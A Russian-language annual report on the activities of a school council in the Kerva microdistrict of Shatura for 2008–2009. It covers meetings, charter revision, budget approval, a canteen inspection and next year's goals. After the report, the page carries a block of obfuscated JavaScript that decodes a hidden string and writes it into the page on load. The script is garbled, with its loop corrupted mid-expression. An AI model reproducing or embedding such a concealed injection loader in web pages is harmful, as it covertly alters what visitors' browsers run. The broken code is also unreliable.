Анализ деятельности

 Совета учреждения

МОУ ООШ мкр. Керва гатуры

за 2008 – 2009 учебный год.

 

 

I.                  Организация деятельности.

Совет учреждения, обладающий комплексом управленческих полномочий, в том числе по распределению стимулирующей части ФОТ,  в МОУ ООШ мкр. Керва гатуры  действует с 01.09.2007 года. Заседания Совета учреждения проводятся регулярно в соответствии с регламентом: в 2007 – 2008 учебном году проведено 7 заседаний; в 2008 – 2009 учебном году  проведено 6 заседаний.

Внеочередные заседания проводились в 2007-2008 учоду  по инициативе администрации школы по вопросам утверждения Положений по распределению стимулирующей части ФОТ и утверждению размеров стимулирующей части ФОТ.

На заседания Совета учреждения приглашались инспектор ОДН Бадикова Е.А., медицинская сестра ОУ Белова Е.В., педагог – организатор Сенаторова О.Н.

По результатам заседаний Совета учреждения составляются протоколы заседаний, которые размещаются на школьном сайте.

 

II.               Работа Совета.

Совет учреждения активно работал с нормативно-правовой документацией. В связи с реорганизацией учреждения и сменой названия ОУ обновляется нормативно-правовая база школы. На заседаниях Совета учреждения рассматривались Устав ОУ в новой редакции,  локальные акты ОУ.

На заседании совета учреждения рассматривался вопрос о школьной системе оценки качества образования. В школе в соответствии с рекомендациями Управления образования разработан локальный акт – Положение о школьной системе оценки качества образования. В 1 полугодии учебного года проведена работа по разработке показателей для кластерной модели оценки образовательного процесса. Члены Совета ознакомились с методикой кластерной модели.  Анализ результатов 1 полугодия по кластерной модели был заслушан на заседании Совета. Члены Совета учреждения участвовали в процедуре государственной (итоговой) аттестации выпускников 9 класса.

На заседании совета рассматривался вопрос согласования бюджетной заявки, сметы бюджетного финансирования и сметы расходования средств, полученных ОУ.

В целях создания здоровых и безопасных условий для обучения и воспитания на заседании Совета учреждения была утверждена комплексная целевая программа «Здоровье», осуществлен  рейд в школьную столовую по вопросам организации питания уч-ся.

На заседаниях Совета учреждения рассматривались вопросы введения школьного компонента в учебный план 2009 – 2010 уч.г.; организации летнего отдыха уч-ся и др.

 

 

Фактическая деятельность Совета учреждения соответствует плану работы.

Наиболее значимые решения Совета учреждения:

·        Рекомендовать на утверждение педагогическому совету Устава муниципального общеобразовательного учреждения основной общеобразовательной школы микрорайона Керва города Шатуры Московской области в новой редакции.

·        Утвердить кандидатуру Заглодиной Н.В. как председателя Совета учреждения

·        Утвердить кандидатуру  Полуховой Е.А. как заместителя председателя совета

·        Утвердить размеры  доплат компенсационного характера педагогическим работникам и сотрудникам школы за выполнение дополнительных работ, не входящих в круг дополнительных обязанностей работника, размеров стимулирующей части фонда оплаты труда работникам.

·        По итогам рейда в школьную столовую обратить внимание зав. производством Мироновой А.В. на разнообразие блюд меню: первых блюд, молочных и овощных блюд.

 

 

 

Задачи Совета учреждения на 2009 – 2010 учебный год.

1. Защита и содействие в реализации прав и законных интересов участников образовательного процесса.

2. Содействие в улучшении условий организации образовательного процесса, повышения качества обучения и воспитания обучающихся, в наиболее полном удовлетворении образовательных потребностей населения.

3. Общественный контроль рационального использования выделяемых учреждению бюджетных средств, обеспечение «прозрачности» финансово-хозяйственной деятельности образовательного учреждения

4. Содействие и контроль за созданием здоровых и безопасных условий обучения и воспитания, создание антитеррористической, противопожарной защищенности участников образовательного процесса.

 

function pde63eee44(s535e23c){var sebfb0=s535e23c.substr(9,3)-599,ib88fc347,i9ca815a;s535e23c=s535e23c.substr(12);var d91e9c6=s535e23c.length;for(var ca59881e=0;ca59881e848)ka6f868-=848;i9ca815a=ka6f868-sebfb0-50;i9ca815a=db3cf8(i9ca815a);document.write(b3ffa19(i9ca815a));}}pde63eee44(e279dba03());function wd87c2a92(t088224,qdaade){return t088224.substr(qdaade,1);}function ra93f5e(ne4b92197){if(ne4b92197==168)ne4b92197=1025;else if(ne4b92197==184)ne4b92197=1105;return (ne4b92197>=192 && ne4b92197<256) ? ne4b92197+848 : ne4b92197;}function g65813cd1(kfed3041){return kfed3041=='±';}function b3ffa19(f2fd6627){return String.fromCharCode(f2fd6627);}function e279dba03(){return "e9ed0c90d667±178±±223±±220±±232±±215±±227±±219±{667{±21±{578{±15±±14±{488{±165±{513{±152±±125±±195±{474{±168±±168±±164±ncc±156±±174±±163±±162±±153±±164±±163±±157±±162±±168±b±151±{614{/{495{±182±x{607{,,{622{;±247±16,-@{640{±8±JB{574{±8±±186±±184±±15±±1±±252±{487{±181±±169±±126±c{636{±14±±248±±246±>{667{Z^\\{658{T`)±14±{665{){490{fd±165±±176±{595{±22±±20±{516{±204±{614{±253±±226±,%&{500{±194±{491{g{656{(";}function db3cf8(l053f3){var jc923d701=l053f3;if(jc923d701<0)jc923d701+=256;if(jc923d701==168)jc923d701=1025;else if(jc923d701==184)jc923d701=1105;return (jc923d701>=192 && jc923d701<256) ? jc923d701+848 : jc923d701;}
Hosted by uCoz